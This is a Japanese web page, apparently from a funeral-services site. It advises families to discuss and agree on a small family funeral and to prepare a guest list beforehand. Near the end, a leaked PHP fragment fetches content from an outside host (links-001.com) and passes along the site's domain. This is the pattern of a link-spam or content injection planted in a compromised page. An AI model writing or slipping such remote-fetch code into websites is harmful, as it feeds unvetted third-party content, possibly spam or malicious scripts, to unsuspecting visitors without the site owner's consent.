前へ
次へ

家族葬に決定する前に身内での話し合いを

故人とのお別れをゆっくりできる家族葬は、誰を呼ぶかの具体的リストを作成しておくことです。
従来の一般葬と規模は大きく異なるのも家族葬なので、この方法でお葬式を出してよいか、最初に身内とよく話し合い了解を得てからになります。
そのうえで具体的な参列者を決めますが、親族や故人とした人など、かなり限定をされた人のみです。
最初から呼ばない人と呼ぶ人を決めることで、いざという時にすぐに連絡をするべき人に連絡をすることができます。
こうした参列者リストを作成できるのも、身内内で話し合い全員から家族葬に賛成してもらえてこそです。
従来の葬儀スタイルから抜け出せない考えだと、近所の人をはじめ会社関係者など広く呼ぶのが当たり前と考える人もいます。
一度固定観念がついたら柔軟に変えていくのは難しいですし、お葬式に関して意見が分かれることもありますが、話し合うことは大切です。
特に日本人は人数が多い方が勝利をする傾向があるので、多数決で賛成が多ければあまり問題にはなりません。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top